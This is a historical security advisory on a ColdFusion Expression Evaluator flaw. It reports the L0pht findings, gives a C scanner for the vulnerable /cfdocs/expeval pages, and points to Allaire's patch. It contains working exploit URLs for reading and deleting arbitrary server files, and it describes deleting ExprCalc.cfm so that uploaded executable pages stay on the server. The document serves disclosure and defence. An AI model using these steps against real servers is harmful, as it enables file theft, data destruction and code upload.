COMMAND

    Cold Fusion

SYSTEMS AFFECTED

    All platforms

PROBLEM

    Following  is  based  on  L0pht  Security  Advisory  by Weld Pond.
    Although  this  vulnerability  has  been  known  for a while L0pht
    thinks it is worse than originally thought.  Users can upload  and
    potentially execute  files on  the web  server.   Furthermore, few
    sites  seem  to  have   fixed  the  problem.   Major   commercial,
    government,  and  military  sites  have  been  found  to  still be
    vulnerable.

    In issue 54, volume 8 of Phrack Magazine dated December 25,  1998,
    rain.forest.puppy describes a security problem with  installations
    of Cold Fusion Application Server when the online documentation is
    installed.   The  online  documentation  is  installed by default.
    According to Phrack,  the vulnerability allows  web users to  view
    files anywhere on the server.  On February 4, 1999, Allaire posted
    a fix on their web site and also recommend that documentation  not
    be stored on production servers.   They also acknowledge that  the
    hole allows web users to read and also delete files on the server.
    The patch successfully fixes the problem if you decide to keep the
    documentation  on  the  server.   In  examining  an unpatched Cold
    Fusion Application Server it  became apparent that in  addition to
    reading and  deleting files,  web users  also have  the ability to
    upload (potentially executable)  files to the  server.  A  cursory
    survey of  many large  corporate and  e-commerce sites  using Cold
    Fusion turned  up many  vulnerable servers.   The purpose  of this
    advisory is to stress  how important it is  to use the patch  that
    Allaire provides or take other measures to prevent web users  from
    accessing this security hole.

    By default,  the Cold  Fusion application  server install  program
    installs sample code as well as online documentation.  As part  of
    this collection  is a  utility called  the "Expression Evaluator".
    The  purpose  of  this  utility  is  to allow developers to easily
    experiment with Cold Fusion expressions.  It is even allows you to
    create a text file on your local machine and then upload it to the
    application  server  in  order  to  evaluate  it.  This utility is
    supposed to be  limited to the  localhost.  There  are basically 3
    important files in  this exploit that  any web user  can access by
    default:

        /cfdocs/expeval/openfile.cfm
        /cfdocs/expeval/displayopenedfile.cfm
        /cfdocs/expeval/exprcalc.cfm

    The first one lets  you upload a file  via a web form.  The second
    one  saves  the  file  to  the  server.   The  last file reads the
    uploaded file, displays the contents of the file in a web form and
    then  deletes  the  uploaded  file.   The  Phrack  article and the
    advisory from Allaire  relate to "exprcalc.cfm".   A web user  can
    choose to view and delete any file they want.  To view and  delete
    a file like "c:\winnt\repair\setup.log" you would use a URL like:

        http://www.server.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log

    This exploit can be taken a step further.  First go to:

        http://www.server.com/cfdocs/expeval/openfile.cfm

    Select a  file to  upload from  your local  machine and submit it.
    You will then be forwarded  to a web page displaying  the contents
    of the file you uploaded.  The URL will look something like:

        http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt

    Now replace the end of the URL where it shows ".\myfile.txt"  with
    "ExprCalc.cfm". Going  to this  URL will  delete "ExprCalc.cfm" so
    that web users can now  use "openfile.cfm" to upload files  to the
    web server without them being deleted. With some knowledge of Cold
    Fusion a web user can upload  a Cold Fusion page that allows  them
    to browse directories  on the server  as well as  upload, download
    and  delete  files.   Arbitrary  executable  files  could   placed
    anywhere the Cold  Fusion service has  access.  Web  users are not
    restricted to the  web root.   Frequently, Cold Fusion  developers
    use Microsoft Access databases to store information for their  web
    applications.   If  the  described  vulnerability  exists  on your
    server, these database files  could potentially be downloaded  and
    even overwritten with modified copies.  The most concerning aspect
    of  this  vulnerability  is  that  with  a  text  editor and a web
    browser,  web  users  are  able  to download password files, other
    confidential information  and even  upload executable  files to  a
    web server.

    "hYP0[13/\\r" made scanner to  test if servers are  susceptable to
    the l0pht Cold Fusion advisory:

    /*
    COLD FUSION VULNERABILITY TESTER - Checks for the l0pht advisory
    "Cold Fusion Application Server Advisory" dated 4.20.1999
    you can find a copy of this advisory and all other
    l0pht Security Advisories here:
    http://www.l0pht.com/advisories.html

    much of  this program  was blatently  copied from  the cgi scanner
    released about a week ago, written  by su1d sh3ll...  I just  want
    to give  credit where  credit is  due...   this particular scanner
    was "written" (basically  modified) by hypoclear  of lUSt -  Linux
    Users Strike Today...  I know  that it is trivial to check  to see
    if a server  is vulnerable, but  I had fun  doing this so  who the
    heck cares if I want to waste my time...

    compile:   gcc -o coldscan coldscan.c
    usage:     coldscan host
    tested on: IRIX Release 5.3 (this should compile on most *NIX systems though)
    */

    #include <fcntl.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <signal.h>
    #include <stdio.h>
    #include <string.h>
    #include <netdb.h>
    #include <ctype.h>
    #include <arpa/nameser.h>
    #include <sys/stat.h>
    #include <strings.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/socket.h>

    void main(int argc, char *argv[])
    {
     int sock,debugm=0;
     struct in_addr addr;
     struct sockaddr_in sin;
     struct hostent *he;
     unsigned long start;
     unsigned long end;
     unsigned long counter;
     char foundmsg[] = "200";
     char *cgistr;
     char buffer[1024];
     int count=0;
     int numin;
     char cfbuff[1024];
     char *cfpage[5];
     char *cfname[5];


     cfpage[1] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
     cfpage[2] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n";
     cfpage[3] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n";


     cfname[1] = "openfile.cfm           ";
     cfname[2] = "displayopenedfile.cfm  ";
     cfname[3] = "exprcalc.cfm           ";


     if (argc<2)
       {
       printf("\n-=COLD FUSION VULNERABILITY TESTER=-");
       printf("\nusage - %s host \n",argv[0]);
       exit(0);
       }

     if ((he=gethostbyname(argv[1])) == NULL)
       {
       herror("gethostbyname");
       exit(0);
       }

     printf("\n-=COLD FUSION VULNERABILITY TESTER=-\n");
     printf("scanning...\n\n");

     start=inet_addr(argv[1]);
     counter=ntohl(start);

       sock=socket(AF_INET, SOCK_STREAM, 0);
       bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
       sin.sin_family=AF_INET;
       sin.sin_port=htons(80);

      if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
         {
         perror("connect");
         }


    while(count++ < 3)
       {
       sock=socket(AF_INET, SOCK_STREAM, 0);
       bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
       sin.sin_family=AF_INET;
       sin.sin_port=htons(80);
       if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
         {
         perror("connect");
         }
       printf("Searching for %s : ",cfname[count]);

       for(numin=0;numin < 1024;numin++)
          {
          cfbuff[numin] = '\0';
          }

       send(sock, cfpage[count],strlen(cfpage[count]),0);
       recv(sock, cfbuff, sizeof(cfbuff),0);
       cgistr = strstr(cfbuff,foundmsg);
       if( cgistr != NULL)
           printf("Exists!\n");
       else
           printf("Not Found\n");

         close(sock);
       }
     }

SOLUTION

    Allaire  has  posted  a  patch  to  this  vulnerability.   This is
    currently available at:

        http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full

    In addition to this, it is recommended that the documentation  and
    example code not be stored on production servers.